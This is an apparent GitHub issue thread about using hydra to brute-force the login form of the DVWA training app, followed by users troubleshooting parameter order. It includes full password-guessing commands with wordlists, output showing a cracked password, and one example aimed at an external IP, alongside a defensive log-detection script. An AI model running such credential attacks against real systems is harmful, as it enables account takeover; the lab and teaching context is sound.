
SOLUTION: How to solve DVWA /vulnerabilities/brute/

Open vanhauser-thc opened this issue 3 years ago • 23 comments

As many people are not able to solve this easily - this is how to do it:

  1. Log into DVWA (login: admin, password: password)
  2. Collect your PHPSESSID cookie (e.g. look in your browser's cookie jar, use zaproxy, right mouseclick "inspect accessible properties" in firefox, etc.)
  3. `hydra -l admin -p password 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=61p8up0thkqjft9vn5osv6afk2; security=low:F=Username and/or password incorrect'`
  4. profit

You can replace -p password with -P and a file containing passwords, e.g. -P passwords.txt

Note: you need hydra 9.0 - or better 9.2+. hydra 9.1 has a bug in the module and does not work. If your Linux distribution comes with an old version, contact the package maintainer or compile hydra yourself.

vanhauser-thc avatar Mar 11 '21 12:03 vanhauser-thc
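
The DVWA form used above is submitted with GET, so every guess reaches the web server's access log with the username and password in the query string. As an added example (not part of the original post and not hydra code), the Python below flags a client that tries several distinct passwords for one username within a short window; the combined log format, the 60-second window, the threshold of 3, the names `find_guessing` and `SAMPLE_LOG`, and the sample lines are assumptions made for the illustration.

```python
import hashlib
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined format), not real traffic.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Feb/2023:14:15:40 +0000] "GET /vulnerabilities/brute/?username=admin&password=admin&Login=Login HTTP/1.1" 200 4237
127.0.0.1 - - [01/Feb/2023:14:15:40 +0000] "GET /vulnerabilities/brute/?username=admin&password=&Login=Login HTTP/1.1" 200 4237
127.0.0.1 - - [01/Feb/2023:14:15:41 +0000] "GET /vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1" 200 4275
192.0.2.10 - - [01/Feb/2023:14:16:02 +0000] "GET /vulnerabilities/brute/?username=gordonb&password=abc123&Login=Login HTTP/1.1" 200 4237
192.0.2.10 - - [01/Feb/2023:14:16:09 +0000] "GET /vulnerabilities/brute/?username=gordonb&password=abc124&Login=Login HTTP/1.1" 200 4237
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) [^"]*" \d{3}')

def find_guessing(log_text, path="/vulnerabilities/brute/",
                  window=timedelta(seconds=60), threshold=3):
    """Return sorted (client, username, n) tuples where one client tried
    n >= threshold distinct passwords for one username within `window`."""
    attempts = defaultdict(list)   # (client, username) -> [(time, pw digest)]
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, stamp, target = m.groups()
        url = urlsplit(target)
        # keep_blank_values: an empty password (hydra's -e n) is still a guess
        q = parse_qs(url.query, keep_blank_values=True)
        if url.path != path or "username" not in q or "password" not in q:
            continue
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        # keep a digest so the report does not copy plaintext passwords around
        digest = hashlib.sha256(q["password"][0].encode()).hexdigest()
        attempts[(client, q["username"][0])].append((when, digest))
    flagged = []
    for (client, user), events in attempts.items():
        events.sort()
        # largest number of distinct passwords inside any window-sized span
        worst = max(
            len({d for t, d in events[i:] if t - start <= window})
            for i, (start, _) in enumerate(events)
        )
        if worst >= threshold:
            flagged.append((client, user, worst))
    return sorted(flagged)
```

On the sample lines, `find_guessing(SAMPLE_LOG)` reports only the client that cycled three passwords for `admin`; the second client's two tries stay below the threshold.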

Unable to make v9.1 working properly on DVWA 1.9 or 1.10. No connection logged on the web server side.

sochartgit avatar May 06 '21 17:05 sochartgit

@sochartgit why don't you use hydra 9.2 then?

vanhauser-thc avatar May 06 '21 22:05 vanhauser-thc

What a poo solution, seriously. I have wasted 6h, with 5 computer science students trying to figure out why it was not working, experienced the same trouble on kali, latest version, on docker, on windows. No mention anywhere on your site about the fact version 9.1 had troubles.

And you ask me why I don't use version 9.2. Seriously?



sochartgit avatar May 06 '21 23:05 sochartgit

@sochartgit There is an entry in the Changelog that says that there is a fix in the http-post module. Please complain to the package maintainer of the distro you are using that they are shipping an old version, that is not my job. The bug only affected 9.1. Next time you have problems with a software I highly recommend to check if there is a new version available.

vanhauser-thc avatar May 07 '21 06:05 vanhauser-thc

Naaaa, problem was with http-GET and http-GET-form, no mention anywhere.



sochartgit avatar May 07 '21 11:05 sochartgit

that is not only documented but also shown in the proposed solution ...

vanhauser-thc avatar May 07 '21 15:05 vanhauser-thc

Any idea why the package is not updated to 9.2 when using apt install hydra? it says the latest version 9.1 is installed

JohnSt99 avatar May 08 '21 15:05 JohnSt99

@JohnSt99 that is up to the package maintainer. just check out who is the package maintainer at the distribution you are using. but you could just compile it yourself? that is what I do with most of the important software I am using.

vanhauser-thc avatar May 08 '21 17:05 vanhauser-thc

I ended up compiling it myself, but I found it weird that apt in Kali downloads 9.1 almost 2 months after the release. Will keep in mind from now on to check latest versions myself! Maybe you could add that other modules also got fixed in 9.2 because I was about to ignore the latest version until I randomly stumbled on this thread

JohnSt99 avatar May 09 '21 02:05 JohnSt99

Came across the same situation and wasted 8h+ of time.

Unfortunately the Kali repo still hasn't updated the hydra package to the present day 👎 So I also ended up compiling it myself - and hey, now it works ;-)

kastahl avatar Jul 12 '21 11:07 kastahl

(I know it's been a while, but) this doesn't even work. Here is my command:

```
./hydra -L /usr/share/wordlist/rockyou.txt -P /usr/share/wordlist/rockyou.txt "http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie\:PHPSESSID=61p8up0thkqjft9vn5osv6afk2; security=low"
```

But I just tried the command you provided and that one gives the same output: `[ERROR] no valid optional parameter type given: S` (or F if you use my command)

Troughy avatar Oct 23 '22 14:10 Troughy

true, a PR from a user changed the behaviour. F=/S= now has to be the last parameter. updated the solution.

vanhauser-thc avatar Oct 23 '22 18:10 vanhauser-thc

```
hydra 176.152.21.45 http-form-post "/dvwa/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed" -L username.txt -P passwords.txt
```

Note: 176.152.21.45 is the target IP, /dvwa/login.php is the target address. Don't add http or https in front of it. username is the field name of the user name, and password is the field name of the password. You can find them in the source code. "Login failed" is the message printed on the webpage in case you enter a wrong username and password, Login is the name of the login button in the source code, and username.txt and password.txt are the lists of usernames and passwords and should be saved in the same directory where you run this code. Good luck

khybermunsef avatar Jan 29 '23 05:01 khybermunsef

I have a problem in termux. When I use hydra, it shows 'hydra command not found'. What is the solution? Please reply.


Eksjjeow82k avatar Jan 29 '23 06:01 Eksjjeow82k

> Am trying to but brute force DVWA with the command `hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"`
>
> but Hydra keep giving below error `[ERROR] no valid optional parameter type given: F`
>
> @can someone tell me what am doing wrong

It seems the F= or S= parameters need to be at the end, e.g. this works:

```
$ hydra  -I -l admin -p password \
  -e ns  -F  -u  -t 4  -w 15  -v  -V  127.0.0.1 -s 8000  http-get-form \
  "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=medium; PHPSESSID=${SESSIONID}:S=Welcome to the password protected area"

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-01 14:15:40
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 3
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking http-get-form://127.0.0.1:8000/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=medium; PHPSESSID=8ec4228fc3f12d91b9086c9ddec1b51d:S=Welcome to the password protected area
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "admin" - 1 of 3 [child 0] (0/0)
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "" - 2 of 3 [child 1] (0/0)
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - 3 of 3 [child 2] (0/0)
[8000][http-get-form] host: 127.0.0.1   login: admin   password: password
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-01 14:15:41
```

This fails:

```
$ hydra  -I -l admin -p password \
  -e ns  -F  -u  -t 4  -w 15  -v  -V  127.0.0.1 -s 8000  http-get-form \
  "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=${SESSIONID}"

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-01 14:16:06
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 3
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking http-get-form://127.0.0.1:8000/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=8ec4228fc3f12d91b9086c9ddec1b51d
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ERROR] no valid optional parameter type given: S
```

elfshed avatar Feb 01 '23 12:02 elfshed

> Am trying to but brute force DVWA with the command `hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"`
>
> but Hydra keep giving below error `[ERROR] no valid optional parameter type given: F`
>
> @can someone tell me what am doing wrong

Check this out first I try

image

You see it doesn't like 'Username and', wants it to be in format X=value, Then when I specify F=Username and it says there's no valid optional parameter type given: F

This seems like a bug in my opinion, what do you guys think?

eoswins avatar Feb 02 '23 05:02 eoswins

> As many people are not able to solve this easily - this is how to do it:
>
> 1. Log into DVWA (login: admin, password: password)
> 2. Collect your PHPSESSID cookie (e.g. look in your browser's cookie jar, use zaproxy, right mouseclick "inspect accessible properties" in firefox, etc.)
> 3. `hydra -l admin -p password 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=61p8up0thkqjft9vn5osv6afk2; security=low:F=Username and/or password incorrect'`
> 4. profit
>
> You can replace -p password with -P and a file containing passwords, e.g. -P passwords.txt
>
> Note: you need hydra 9.0 - or better 9.2+. hydra 9.1 has a bug in the module and does not work. If your Linux distribution comes with an old version, contact the package maintainer or compile hydra yourself.

Have you tried this with a username and password file? it thinks all my username/password combinations are correct...to me it looks like it's ignoring the F argument.. (this will look like it works fine if you just run the correct user and pass specifying -l, -p)

eoswins avatar Feb 02 '23 05:02 eoswins

> > Am trying to but brute force DVWA with the command `hydra 192.168.22.132 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=bf132de2b2b47b73"` but Hydra keep giving below error `[ERROR] no valid optional parameter type given: F` @can someone tell me what am doing wrong
>
> Check this out first I try
>
> image
>
> You see it doesn't like 'Username and', wants it to be in format X=value, Then when I specify F=Username and it says there's no valid optional parameter type given: F
>
> This seems like a bug in my opinion, what do you guys think?

If you specify the F= parameter it has to be the last parameter specified, e.g. after the cookie headers in your example.

elfshed avatar Feb 02 '23 07:02 elfshed

When I finish the hydra brute force it shows 'valid password no found ', so what do I do next? Please reply.

On Sun, Jan 29, 2023, 10:30 AM Khaibrullah Munsef @.***> wrote:

> use this code: `hydra 192.168.10.10 http-form-post "/dvwa/login.php:usernam=^USER^&password=^PASS^&Login=submit:Login failed" -L username.txt -P passwords.txt`


Eksjjeow82k avatar Feb 03 '23 14:02 Eksjjeow82k

I'm having the same issue on a box in Hack the Box. It seems like Hydra just does not evaluate some of the response headers, no matter how you structure your command. I've filed another bug report on it myself.

ZackInMA avatar Mar 02 '23 03:03 ZackInMA

Hello, I'm new to cybersecurity and am trying to brute force dvwa on low.

I am running this command:

```
hydra -L usernames.txt -P rockyou.txt -s 80 127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:security=low; PHPSESSID=cfdrv2bm5folucadb2fs15o223" -I
```

Between each [ATTEMPT] message in the CLI, I am getting an `[ERROR] Caught unkown error code, exiting!` message. I'm also getting `[ERROR] optional parameters must have the format X=value: username=^USER^&password=^PASS^&Login=Login:incorrect:H=Cookie: security=low; PHPSESSID=cfdrv2bm5folucadb2fs15o223`

Does anyone know as to why this might be happening?

AndrewChedid avatar Aug 17 '23 16:08 AndrewChedid